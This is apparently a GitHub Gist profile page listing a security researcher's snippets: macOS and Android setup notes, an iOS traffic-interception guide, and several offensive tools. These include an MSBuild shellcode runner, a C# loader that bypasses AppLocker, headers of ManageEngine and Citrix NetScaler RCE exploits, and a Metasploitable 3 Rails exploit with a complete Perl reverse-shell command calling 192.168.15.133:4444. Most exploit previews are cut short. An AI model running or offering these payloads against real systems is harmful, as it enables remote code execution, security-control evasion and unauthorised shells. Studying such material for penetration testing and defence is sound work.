LongCat pich4ya
@pich4ya
pich4ya / sudotouchid.sh
Created March 20, 2021 08:27
Automatically enable Macbook Pro's Touch ID for sudo after MacOS version upgrade
# Automatically enable Macbook Pro's Touch ID for sudo after MacOS version upgrade
sudotouchid () {
  if ! /usr/bin/grep -Fq "pam_tid.so" /etc/pam.d/sudo
  then
    # Use Touch ID to enable Touch ID for sudo
    /usr/bin/osascript -e 'do shell script "/usr/bin/sed -i '' -e \"1s/^//p; 1s/^.*/auth sufficient pam_tid.so/\" /etc/pam.d/sudo" with administrator privileges'
  fi
}
sudotouchid
@pich4ya
pich4ya / binance_balance_to_line_notify.py
Created March 8, 2021 15:07
Binance Balance Summary to LINE Notify
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# https://python-binance.readthedocs.io/en/latest/
# apt install python3-pip
# pip3 install python-binance requests
import requests
from binance.client import Client
import json
import decimal
import datetime
@pich4ya
pich4ya / gist:1ac125726e4f79c6832899e6c9b7bde1
Last active December 21, 2023 10:19
How to capture Xamarin and Flutter HTTPS API traffic using iPhone and MBP
# @author Pichaya Morimoto ([email protected])
# How to capture Xamarin and Flutter HTTPS API traffic using iPhone and MBP
# How to MITM and intercept an iOS app's Web API traffic via macOS -> Burp Suite when the app is proxy-unaware
# (e.g. Xamarin or Flutter apps, which do not go through the system proxy and do not use the default cert store on the iPhone)
# For a normal app that already uses the system proxy, this procedure is not needed; just configure the proxy as usual
1. Plug the (jailbroken) iPhone into the MBP over USB, then use iproxy so that local port 8080 on the iPhone is forwarded to local port 8080 on the MBP through an ssh reverse tunnel (-R)
$ brew install usbmuxd
$ iproxy 2222 22 & disown && ssh -R 8080:localhost:8080 -p 2222 [email protected] -N -f
@pich4ya
pich4ya / fix_virtualenv
Created May 16, 2020 18:45 — forked from tevino/fix_virtualenv
Fix python virtualenv after python update
#!/usr/bin/env bash
ENV_PATH="$(dirname "$(dirname "$(which pip)")")"
SYSTEM_VIRTUALENV="$(which -a virtualenv|tail -1)"
BAD_ENV_PATHS="/usr/local"
echo "Ensure the root of the broken virtualenv:"
echo " $ENV_PATH"
@pich4ya
pich4ya / magisk_pixel3a.txt
Last active September 15, 2023 11:41
Clean Flash Magisk on Pixel 3a (Android 9)
@author LongCat (Pichaya Morimoto)
1. Enable ADB
Settings > About Phone > Tap on the "Build Number" entry 7 times
Settings > System > Advanced > Developer options > Enable "USB debugging"
Settings > System > Advanced > Developer options > Enable "OEM unlocking"
Note: If you cannot enable "OEM unlocking", then you are out of luck - Buy the new one :)
Connect Pixel 3a to MBP > allow access in the device's prompt.
@pich4ya
pich4ya / shellcode.xml
Created May 1, 2020 23:57 — forked from ConsciousHacker/shellcode.xml
MSBuild Shellcode Runner
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes shellcode. -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
<!-- Save This File And Execute The Above Command -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
@pich4ya
pich4ya / Shellcode.cs
Created May 1, 2020 23:54 — forked from netbiosX/Shellcode.cs
C# file that contains shellcode and bypasses AppLocker via Assembly Load
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
 
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
#!/usr/local/bin/python3
"""
ManageEngine Desktop Central FileStorage getChartImage Deserialization of Untrusted Data Remote Code Execution Vulnerability
Download: https://www.manageengine.com/products/desktop-central/download-free.html
File ...: ManageEngine_DesktopCentral_64bit.exe
SHA1 ...: 73ab5bb00f993685c711c0aed450444795d5b826
Found by: mr_me
Date ...: 2019-12-12
CVE ....: CVE-2020-10189
@pich4ya
pich4ya / readme_render_exploit.py
Last active February 8, 2020 23:40
Fix broken rails_dynamic_render_code_exec's exploit against Metasploitable 3
# @author Pichaya Morimoto ([email protected])
# Exploit for Metasploitable 3 - render params[:os] 's RCE
# msf: multi/http/rails_dynamic_render_code_exec is not working due to no ImageMagick
# This exploit slightly adjusts the temporary file extension to an empty string
import requests
# 1. tmp upload
host = "172.28.128.3"
cmd = "perl -e 'use Socket;$i=\"192.168.15.133\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"
@pich4ya
pich4ya / netscaler_exploit.py
Created January 19, 2020 14:56 — forked from 0x09AL/netscaler_exploit.py
Citrix ADC / NetScaler Remote Command Execution
import requests
import sys
import time
append_value = str(time.time())
print "# By 0x09AL - MDSec ActiveBreach \n"
def upload_file(url,payload):
    endpoint = url + "/vpns/portal/scripts/newbm.pl"